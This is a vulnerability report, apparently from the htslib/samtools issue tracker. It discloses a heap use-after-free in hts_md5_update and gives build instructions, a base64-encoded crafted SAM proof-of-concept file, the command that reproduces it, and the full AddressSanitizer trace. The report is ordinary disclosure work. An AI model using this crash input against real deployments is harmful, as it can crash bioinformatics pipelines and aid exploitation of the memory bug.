Use-after-free during hts_md5_update

[OctavioGalland]

Summary

Use-after-free in hts_md5_update during parsing of a crafted SAM/FASTA file pair.

Environment

Built using LLVM 14 with ASAN on Ubuntu 22.04

How to reproduce

Build with ASAN on latest commit like so:

git clone --recursive https://github.com/samtools/htslib
cd htslib
autoreconf -i
CC=clang-14 CXX=clang++-14 CFLAGS="-fsanitize=address -g" CXXFLAGS="-fsanitize=address -g" LDFLAGS="-fsanitize=address -g" ./configure
make -j$(nproc)

git clone --recursive https://github.com/samtools/samtools
cd samtools
autoheader
autoconf -Wno-syntax
CC=clang-14 CXX=clang++-14 CFLAGS="-fsanitize=address -g -I$(pwd)/../htslib" CXXFLAGS="-fsanitize=address -g -I$(pwd)/../htslib" LDFLAGS="-fsanitize=address -g -L$(pwd)/../htslib" ./configure
make -j$(nproc)

Within the samtools folder, get poc file and reproduce with:

echo -ne "QENPCVNTU1NTrFNTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NSU1NTU1NTU1NTU1NTU1NTU1NTU1NT
U1NTU1NTU1NTU3FTU1NTU1NTU1NTU1NTU3NRDQ0NDQ0CDQ0NDQ0NDQ0NDQ0NDQ0NDU46YzEJTE46
MTAKczAJMAljMQkxCTQJMTBNCSoJMAkwCUFBQ0NHQ0dHVFQJKioqKioqKioqKgpzMQk5CWMxCTIJ
MAkxME0JKgkwCTAJAUNDR0NHR1RUQwkqKioqKioqKigqCnMyCTAJYzEJMwkwCTEwTQkqCTAJMAlD
Q0dDR0dUVENHCSoqKipHKioqKioKDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDVMNDQ0NDQ0NDQ1ubm5u
bm5ubg0NDQ0JMDExMTExMTExMTEJYzIJMzMJMAkxME0JKgkwCTAJQUFDQ0dDR0dUVAkqKioqKioq
KioqCnMxCTAxCWMxCTMzCTAJMTBNCSoJMAkwCUFBQ0NHQ0dHVFQJKioqKioqKioqKgpzMQkwCWMx
CTIJMAkxME0JKgkwCTAJQUMtR0NHR1RUQwkqKioqKioqKioqCipzMgkwUwpA" | base64 -d > poc
./samtools view -C -T ../htslib/test/c2.fa poc

Which on my setup outputs:

CRAM-P���>	I�ρA�}�K
�0`u��w���>ڀP� ��G�}��jA�����҅��~�f�l4�lFt��Y�����-ڵV��d�$DA�D+���	�v%��&��e�31��D�eԇ�h:���R�=ܢ7��r�w��=8��{w�r�
                                                                                                                     �9
W��;=Yx(#2W��Qġ�p�q� �D��%�Tŕ�
      ���AP��mm��74[W::sam_parse1] unrecognized reference name "c1"; treated as unmapped
[W::sam_parse1] unrecognized reference name "c1"; treated as unmapped
[W::sam_parse1] unrecognized reference name "c1"; treated as unmapped
[W::sam_parse1] unrecognized reference name "c1"; treated as unmapped
=================================================================
==12230==ERROR: AddressSanitizer: heap-use-after-free on address 0x6020000051b0 at pc 0x55cc6044fc97 bp 0x7ffd1d4ace80 sp 0x7ffd1d4ac650
READ of size 1 at 0x6020000051b0 thread T0
    #0 0x55cc6044fc96 in __asan_memcpy (/home/octavio/samtools/samtools+0x132c96) (BuildId: 7078ea94d4e08689f85e1df47e2d609c021d2440)
    #1 0x55cc607633e9 in hts_md5_update /home/octavio/htslib/md5.c:268:2
    #2 0x55cc60821cbd in cram_encode_container /home/octavio/htslib/cram/cram_encode.c:2041:17
    #3 0x55cc6089196c in cram_flush_container /home/octavio/htslib/cram/cram_io.c:4128:14
    #4 0x55cc60892795 in cram_flush_container_mt /home/octavio/htslib/cram/cram_io.c:4280:16
    #5 0x55cc6083bfb7 in cram_next_container /home/octavio/htslib/cram/cram_encode.c:3129:19
    #6 0x55cc60839ddc in cram_put_bam_seq /home/octavio/htslib/cram/cram_encode.c:3889:30
    #7 0x55cc607a74f0 in sam_write1 /home/octavio/htslib/sam.c:4437:16
    #8 0x55cc604b6b1c in check_sam_write1 /home/octavio/samtools/sam_view.c:404:13
    #9 0x55cc604b8f2a in process_one_record /home/octavio/samtools/sam_view.c:715:17
    #10 0x55cc604ae3ec in stream_view /home/octavio/samtools/sam_view.c:758:18
    #11 0x55cc604a9be8 in main_samview /home/octavio/samtools/sam_view.c:1363:15
    #12 0x55cc60528eed in main /home/octavio/samtools/bamtk.c:244:55
    #13 0x7f1911029d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    #14 0x7f1911029e3f in __libc_start_main csu/../csu/libc-start.c:392:3
    #15 0x55cc603cdb24 in _start (/home/octavio/samtools/samtools+0xb0b24) (BuildId: 7078ea94d4e08689f85e1df47e2d609c021d2440)

0x6020000051b0 is located 0 bytes inside of 1-byte region [0x6020000051b0,0x6020000051b1)
freed by thread T0 here:
    #0 0x55cc60450d96 in __interceptor_realloc (/home/octavio/samtools/samtools+0x133d96) (BuildId: 7078ea94d4e08689f85e1df47e2d609c021d2440)
    #1 0x55cc60707c38 in ks_resize /home/octavio/htslib/./htslib/kstring.h:160:19
    #2 0x55cc60700703 in kputsn /home/octavio/htslib/./htslib/kstring.h:237:24
    #3 0x55cc606f3896 in build_header_line /home/octavio/htslib/header.c:736:11
    #4 0x55cc60701697 in sam_hrecs_rebuild_lines /home/octavio/htslib/header.c:753:13
    #5 0x55cc606ef797 in sam_hrecs_rebuild_text /home/octavio/htslib/header.c:2011:9
    #6 0x55cc606edd42 in sam_hdr_rebuild /home/octavio/htslib/header.c:1258:9
    #7 0x55cc606ed94f in sam_hdr_length /home/octavio/htslib/header.c:1208:22
    #8 0x55cc60897dff in cram_write_SAM_hdr /home/octavio/htslib/cram/cram_io.c:4953:18
    #9 0x55cc6078da10 in sam_hdr_write /home/octavio/htslib/sam.c:2206:13
    #10 0x55cc604a7f8a in main_samview /home/octavio/samtools/sam_view.c:1250:17
    #11 0x55cc60528eed in main /home/octavio/samtools/bamtk.c:244:55
    #12 0x7f1911029d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16

previously allocated by thread T0 here:
    #0 0x55cc60450d96 in __interceptor_realloc (/home/octavio/samtools/samtools+0x133d96) (BuildId: 7078ea94d4e08689f85e1df47e2d609c021d2440)
    #1 0x55cc60707c38 in ks_resize /home/octavio/htslib/./htslib/kstring.h:160:19
    #2 0x55cc60707a9c in kputc_ /home/octavio/htslib/./htslib/kstring.h:262:6
    #3 0x55cc606f386a in build_header_line /home/octavio/htslib/header.c:735:11
    #4 0x55cc60701697 in sam_hrecs_rebuild_lines /home/octavio/htslib/header.c:753:13
    #5 0x55cc606ef797 in sam_hrecs_rebuild_text /home/octavio/htslib/header.c:2011:9
    #6 0x55cc606edd42 in sam_hdr_rebuild /home/octavio/htslib/header.c:1258:9
    #7 0x55cc606ed94f in sam_hdr_length /home/octavio/htslib/header.c:1208:22
    #8 0x55cc60897dff in cram_write_SAM_hdr /home/octavio/htslib/cram/cram_io.c:4953:18
    #9 0x55cc6078da10 in sam_hdr_write /home/octavio/htslib/sam.c:2206:13
    #10 0x55cc604a7f8a in main_samview /home/octavio/samtools/sam_view.c:1250:17
    #11 0x55cc60528eed in main /home/octavio/samtools/bamtk.c:244:55
    #12 0x7f1911029d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16

SUMMARY: AddressSanitizer: heap-use-after-free (/home/octavio/samtools/samtools+0x132c96) (BuildId: 7078ea94d4e08689f85e1df47e2d609c021d2440) in __asan_memcpy
Shadow bytes around the buggy address:
  0x0c047fff89e0: fa fa fd fa fa fa 00 fa fa fa 04 fa fa fa 03 fa
  0x0c047fff89f0: fa fa 00 07 fa fa 00 00 fa fa 04 fa fa fa 00 00
  0x0c047fff8a00: fa fa 00 00 fa fa 04 fa fa fa 00 00 fa fa 00 00
  0x0c047fff8a10: fa fa 04 fa fa fa 00 00 fa fa 00 00 fa fa fd fd
  0x0c047fff8a20: fa fa 00 00 fa fa fd fa fa fa fd fd fa fa 00 fa
=>0x0c047fff8a30: fa fa 00 01 fa fa[fd]fa fa fa fd fa fa fa fd fa
  0x0c047fff8a40: fa fa fd fa fa fa fd fa fa fa fd fd fa fa fd fa
  0x0c047fff8a50: fa fa fd fa fa fa fd fd fa fa fd fd fa fa fd fa
  0x0c047fff8a60: fa fa fd fd fa fa fd fa fa fa fd fd fa fa fd fa
  0x0c047fff8a70: fa fa fd fd fa fa fd fd fa fa fd fa fa fa fd fd
  0x0c047fff8a80: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==12230==ABORTING